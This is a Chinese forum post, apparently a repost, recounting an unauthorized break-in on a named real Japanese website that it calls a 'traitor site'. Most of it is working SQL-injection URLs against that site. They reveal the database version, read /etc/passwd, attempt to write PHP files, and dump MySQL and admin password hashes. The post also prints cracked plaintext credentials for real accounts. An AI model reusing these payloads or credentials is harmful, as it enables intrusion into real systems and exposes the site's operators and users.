原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

1 \& e) g8 b! `! j* s, [0x01. 检测 www.zuaa.jp 收集数据
" `2 y7 A$ _1 l% q$ e2 ~" {& {: ~

whatweb

5 v, t0 [! [4 l) C
2 }  i0 ]/ W' _' w+ x* b! C利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
" c, Q# B( i- ?0x02.找注入点
0 x: T' o2 q9 h) l( V6 ]找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
$ c7 Q+ \* p* p2 z( r* w3 z
9 _+ {( r% t) E5 K7 O: ?! f' |" D
& @2 Z/ Y& I) x  E+ P$ m* ~0x03.order by
$ [4 Q. W7 ^0 x- [- p/ s             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常

0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

/ ~; O) h6 Q( G1 T. X; @中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

& ~2 V8 L# R- `0 i& u4 \0x05. info:
; `9 \5 U3 I9 Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5 z  ?$ s' ]% w" a
5 I# N  }1 J8 D7 O) a: T9 Y7 {& ]- X0 quser:            root@localhost
database:    openpne
version:      4.1.22
+ n9 Z+ d4 E$ z0 Z& \; _os:             portbld-freebsd5.4
+ p3 N; T0 G* w/ ?5 C
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
7 e/ k3 ?( D# z  F0 P( g) {7 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 y0 a2 B1 l# o5 @& N
通过工具转换
2 x; X) U9 D$ P% G
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
* C# n& [5 }& w0 a) j8 R4 k
" t" z2 v4 w; G" h- M  G0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 ~7 h% H5 n% Y  c' }( |
, P, c! Z; n) A8 A( i8 q" w# E6 |4 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
, ~) Q" \, T7 y7 Y6 u* u! B
0x08. 利用 mysql 4.1
8 j% P% p! y9 }6 q2 z猜常规表名，字段未果 工具 sqlmap
, E! c* T! H8 F5 E, G! i7 H6 V. X1 v中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
- [" N% T. c# {5 C/ D3 _) [( F5 E
" X1 w. `$ S4 {) Y: o6 z0 q, L
! i& e8 O; s# j( b
3 g+ H& f' z* H" E. q0x09. 查找后台
8 b2 F5 ^, |. S1 ]" O7 H. K利用 现有的各种 后台工具尝试都不行
) ?. S' [8 a9 q7 ?) o/ a8 S
+ @( _, b/ \5 r2 H( u0x10.  MySL外联方法
% v# K3 j# V# m* \3 }; S6 K9 a从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
1 \6 G; ?# {) U9 J& m+ R, }2 p
这个可以在 www.cmd5.com 解密
3 ~7 Y; ]" t- Mroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
9 x7 h$ m$ X+ n! ]: e  Uchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
3 X( O6 w  {; R, C! U; jopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
7 i% r' w/ [, x$ p( e7 p) N) w工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
" F/ x( k; Q+ D& p: F0 |5 k
# [( M& T# K+ B4 }& f" O
0x11. 网站突破
  n2 q( \3 o6 v5 X发现网站的源程序 openpne, google 下载 openpne 源码


) f. M  \* n+ V' N- }6 f; W/ Q0x12. 默认信息利用
- I0 Y0 @2 Y) X. z+ c& b4 E# E2 ?; qhttp://sns.zuaa.jp/?m=admin&a=page_login
1 k+ ]5 R( }6 ?. j) c- H8 Q
  i5 _4 a$ e5 S8 c9 F表名 (c_admin_user) ，字段名（username,password）
" N. ?3 y" O3 L8 G' L2 L+ bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

6 [; Y* I' P6 A. Z: z( n( h解密
& `% T. Y* W! [zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

; t, M. Y. E% }* N) k, z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

6 _# \4 w5 p# w& T0x13. 登录后台


: M$ ]* n5 Q' F4 S
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
/ R# h6 W5 Q( r0 e9 U3 A. Y! h% Y# u7 S------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
/ b; u% h$ \4 E- y; l中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 e. M3 Y- w; L% D2 J* V7 j
; x. @, D- X9 D; X/ Y- a/ |6 _最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
: P) ?2 m/ N* T6 ^/ q! Z. B4 X

荒村狂客

哪个牛人 费的这劲 入侵的